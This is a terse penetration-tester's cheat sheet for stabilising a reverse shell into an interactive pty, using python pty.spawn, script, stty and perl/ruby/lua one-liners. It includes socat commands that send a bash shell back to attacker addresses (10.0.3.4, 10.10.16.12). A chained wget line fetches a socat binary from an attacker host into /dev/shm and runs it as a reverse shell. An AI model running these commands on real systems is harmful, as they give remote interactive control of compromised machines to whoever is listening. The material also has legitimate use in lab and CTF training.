Methods to make a new pty session:
- python pty
# Host
rlwrap nc -lvnp 4444
# Remote
export TERM=xterm-color
dpkg -l | grep python3
python3 -c 'import pty;pty.spawn("/bin/bash")'
# Ctrl+Z (suspends nc and returns to the host shell)
stty raw -echo; fg
# Back to remote
reset
stty rows 200 columns 200
# Path and alias (/tmp is world-writable, so keep it last in PATH where it cannot shadow system binaries)
export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
alias ll='clear ; ls -lsaht --color=auto'
- bash script
# remote
# script - make typescript of terminal session
# (1) do not store session log
script /dev/null -c /bin/bash
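# (2) store session log (the typescript records everything printed to the terminal, including any secrets that are displayed)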
mkdir -p /dev/shm/qwe/; script /dev/shm/qwe/script.txt -c /bin/bash
# ctrl+z, local
$ stty size; stty raw -echo; fg
# remote
$ reset
$ export SHELL=bash
$ export TERM=xterm-256color
$ stty rows <num> columns <cols>
- socat
# local
$ socat file:`tty`,raw,echo=0 tcp-listen:1234
# remote
$ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
$ wget -q http://<IP>/socat -O /dev/shm/socat; chmod +x /dev/shm/socat; /dev/shm/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<IP>:1234
$ export RHOST=10.10.16.12; export PORT=80; export RPORT=1234; wget -q http://$RHOST:$PORT/socat -O /dev/shm/socat; chmod +x /dev/shm/socat; /dev/shm/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:$RHOST:$RPORT
socat install (prebuilt static binary from a third-party repository; verify its checksum before running it):
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat
- other languages
# bash
echo os.system('/bin/bash')
/bin/sh -i
# perl
perl -e 'exec "/bin/sh";'
# ruby
exec "/bin/sh"
ruby -e 'exec "/bin/sh"'
# lua
lua -e "os.execute('/bin/sh')"
Related information:
- tty
- pty
- stty
Mark:
Ctrl+C still does not work properly in the upgraded shell. (Environment: Kali, tmux, zsh; rlwrap nc + script + Ctrl+Z + stty + reset)